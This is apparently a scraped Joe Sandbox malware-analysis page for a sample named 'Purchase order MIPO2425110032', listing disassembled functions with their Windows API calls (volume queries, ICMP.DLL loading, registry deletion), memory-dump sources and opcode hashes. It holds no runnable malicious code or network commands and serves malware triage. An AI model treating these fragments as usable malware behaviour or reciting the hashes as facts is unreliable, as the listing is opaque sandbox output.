                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$DiskFreeSpace
                                                            • String ID: \VH
                                                            • API String ID: 1682464887-234962358
                                                            • Opcode ID: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                                                            • Instruction ID: ae55674c87016058c86dc8d4ad6f5a536cd264dc70ae423c542bf2f5a0a67e7a
                                                            • Opcode Fuzzy Hash: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                                                            • Instruction Fuzzy Hash: C9316F75E002089FCB00EFA5D985A9DBBB4FF48314F1080AAE904AB351CB75EE05CB94
                                                            Function 0045D86D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetErrorMode.KERNEL32(00000001), ref: 0045D87B
                                                            • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D8F0
                                                            • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D93A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$DiskFreeSpace
                                                            • String ID: \VH
                                                            • API String ID: 1682464887-234962358
                                                            • Opcode ID: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                                                            • Instruction ID: e5212c229d9c2069cdfe567d9572a18bb695f81ecf44ad0a977260396f8f3e20
                                                            • Opcode Fuzzy Hash: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                                                            • Instruction Fuzzy Hash: E6316D75E002089FCB00EFA5D984A9EBBB4FF48314F1084AAE904AB351CB35DE05CB94
                                                            Function 0045D36D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetErrorMode.KERNEL32(00000001), ref: 0045D37E
                                                            • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D3F4
                                                            • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D437
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$InformationVolume
                                                            • String ID: \VH
                                                            • API String ID: 2507767853-234962358
                                                            • Opcode ID: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                                                            • Instruction ID: 9072e4f9bd6fffdf4d5f5b526d3ef1379cf95bcdbb04681c41660468616ecd75
                                                            • Opcode Fuzzy Hash: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                                                            • Instruction Fuzzy Hash: E5213075A002099FC714EF95CD85EAEB7B8FF88300F1084AAE905A73A1D774EA45CB54
                                                            Function 0045D53E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetErrorMode.KERNEL32(00000001), ref: 0045D55C
                                                            • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D5D2
                                                            • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D608
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$InformationVolume
                                                            • String ID: \VH
                                                            • API String ID: 2507767853-234962358
                                                            • Opcode ID: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                                                            • Instruction ID: 5d1496e5fec29648c5677f840c6a5ff7f703137340fc9510fe584f3610dc7e3a
                                                            • Opcode Fuzzy Hash: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                                                            • Instruction Fuzzy Hash: 88218271A00209AFC714EF95C885EAEB7B4FF48300F0084AEF505A72A1D774E905CB58
                                                            Function 00450ACC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450B3B
                                                            • SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450B51
                                                            • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450B5F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID: msctls_trackbar32
                                                            • API String ID: 3850602802-1010561917
                                                            • Opcode ID: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                                                            • Instruction ID: cc80dcb7cd3031ad5716ab9229ca2671b5dcb2452333e47e40e099fef7a03d8b
                                                            • Opcode Fuzzy Hash: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                                                            • Instruction Fuzzy Hash: 301196757403197BEB109EA8DC81FDB339CAB58B64F204216FA10A72C1D6B4FC5187A8
                                                            Function 00435215 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                            • CLSIDFromString.OLE32(?,00000000), ref: 00435236
                                                            • SafeArrayAccessData.OLEAUT32(?,?), ref: 00435285
                                                            • SafeArrayUnaccessData.OLEAUT32(?), ref: 004352B4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: ArrayDataSafe$AccessFromStringUnaccess_malloc
                                                            • String ID: crts
                                                            • API String ID: 943502515-3724388283
                                                            • Opcode ID: 031137863c8e0c47242e3f4e8af28b292991bfcc14335036069225f3ba33e56a
                                                            • Instruction ID: ec3ec3aa447b477297a9cb7ebc6a7fbeb91602aa87849f29064a6671b92f781e
                                                            • Opcode Fuzzy Hash: 031137863c8e0c47242e3f4e8af28b292991bfcc14335036069225f3ba33e56a
                                                            • Instruction Fuzzy Hash: EC213876600A009FC714CF8AE444D97FBE8EF98760714C46AEA49CB721D334E851CB94
                                                            Function 0045D2C7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetErrorMode.KERNEL32(00000001), ref: 0045D2D2
                                                            • SetVolumeLabelW.KERNEL32(?,00000000), ref: 0045D331
                                                            • SetErrorMode.KERNEL32(?), ref: 0045D35C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$LabelVolume
                                                            • String ID: \VH
                                                            • API String ID: 2006950084-234962358
                                                            • Opcode ID: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                                                            • Instruction ID: 93ef07912bcba266d24f4400c0aa25f887f93b2782b8649f9ae8f5902fc9f078
                                                            • Opcode Fuzzy Hash: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                                                            • Instruction Fuzzy Hash: 10115175900105DFCB00EFA5D94499EBBB4FF48315B1084AAEC09AB352D774ED45CBA5
                                                            Function 004496E9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                            • GetMenuItemInfoW.USER32 ref: 00449727
                                                            • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00449751
                                                            • DrawMenuBar.USER32 ref: 00449761
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Menu$InfoItem$Draw_malloc
                                                            • String ID: 0
                                                            • API String ID: 772068139-4108050209
                                                            • Opcode ID: 3541028282ab776972351b8d7755a9370f029d0fb516ca01e5f6c7a74b6cc1b7
                                                            • Instruction ID: eb12e692e9d899ed3776fa10421b592e4983edb38958d2313c52402e3f8558b6
                                                            • Opcode Fuzzy Hash: 3541028282ab776972351b8d7755a9370f029d0fb516ca01e5f6c7a74b6cc1b7
                                                            • Instruction Fuzzy Hash: 7711A3B1A10208AFEB10DF55DC49BAFB774EF85314F0041AEFA098B250DB759944DFA5
                                                            Function 00472A2B Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$_wcscpy
                                                            • String ID: 3, 3, 8, 1
                                                            • API String ID: 3469035223-357260408
                                                            • Opcode ID: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                                                            • Instruction ID: 583e1dd4926d5dc430cd1974fab242c37593855fc3f83b6d902887b8cb8118b3
                                                            • Opcode Fuzzy Hash: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                                                            • Instruction Fuzzy Hash: 44F06D61510655E2CB34A791AD917FF72546F44341F00947BD90ED2190F368CB85CF99
                                                            Function 004312CC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312DE
                                                            • GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 004312F0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: ICMP.DLL$IcmpCloseHandle
                                                            • API String ID: 2574300362-3530519716
                                                            • Opcode ID: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                                                            • Instruction ID: fe30dd6f995ef3e52e92cf139519288d45b371df6a06e7fbbc01cfddaae6e452
                                                            • Opcode Fuzzy Hash: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                                                            • Instruction Fuzzy Hash: 89E01275500316DFDB105F66D80564B77DCDB14751F10482AFD45E2A51DBB8D48087E8
                                                            Function 004312FE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 00431310
                                                            • GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 00431322
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: ICMP.DLL$IcmpCreateFile
                                                            • API String ID: 2574300362-275556492
                                                            • Opcode ID: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                                            • Instruction ID: 95e0d00128142f820e0a83de5ed484af687323a382b0c693d148963e73e99334
                                                            • Opcode Fuzzy Hash: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                                            • Instruction Fuzzy Hash: E3E0C270400306EFD7107FA5D81464A77E8DB08310F104C2AFC40A2650C7B8D48087A8
                                                            Function 0043129A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312AC
                                                            • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004312BE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: ICMP.DLL$IcmpSendEcho
                                                            • API String ID: 2574300362-58917771
                                                            • Opcode ID: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                                            • Instruction ID: f6e067919a3be2c94262fb81e38fb1c28335358536499f04279aa6303c0198c7
                                                            • Opcode Fuzzy Hash: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                                            • Instruction Fuzzy Hash: ADE0C2B0400706DFC7105F65D80465B77D8DB04321F10482BFD80E2610C7B8E48087A8
                                                            Function 00430C7F Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00430C91
                                                            • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00430CA3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: RegDeleteKeyExW$advapi32.dll
                                                            • API String ID: 2574300362-4033151799
                                                            • Opcode ID: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                                            • Instruction ID: e1e112c22781e886f83f7ab60c8bc672304d94c0271b2a691c2b6ddb7eb549cd
                                                            • Opcode Fuzzy Hash: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                                            • Instruction Fuzzy Hash: 3FE0C2B0440315AFCB106F6AD95460B7BD89B14321F10583BF980E2600C7B8E88087B8
                                                            Function 00451D2B Relevance: 6.4, APIs: 4, Instructions: 405COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6f77df26dc74fc40ac7bf47809af4b9178697b073442c11c01de5ef3306f6c16
                                                            • Instruction ID: c5df29d3d24fc858ebdc5227190e2e918b6fbc7f8fe9fd347d916346834f6d96
                                                            • Opcode Fuzzy Hash: 6f77df26dc74fc40ac7bf47809af4b9178697b073442c11c01de5ef3306f6c16
                                                            • Instruction Fuzzy Hash: 66E17F75600209AFCB04DF98C880EAEB7B9FF88714F10859AE909DB351D775EE45CBA0
                                                            Function 00479500 Relevance: 6.2, APIs: 4, Instructions: 162memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • VariantInit.OLEAUT32(?), ref: 0047950F
                                                            • SysAllocString.OLEAUT32(00000000), ref: 004795D8
                                                            • VariantCopy.OLEAUT32(?,?), ref: 0047960F
                                                            • VariantClear.OLEAUT32(?), ref: 00479650
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Variant$AllocClearCopyInitString
                                                            • String ID:
                                                            • API String ID: 2808897238-0
                                                            • Opcode ID: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                                            • Instruction ID: 372c40b5ecffa4d340e825e49f449287305c7189bb1404562c27c74c4f1437f4
                                                            • Opcode Fuzzy Hash: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                                            • Instruction Fuzzy Hash: 8251C436600209A6C700FF3AD8815DAB764EF84315F50863FFD0897252DB78DA1997EA
                                                            Function 0046993E Relevance: 6.1, APIs: 4, Instructions: 149windowCOMMON
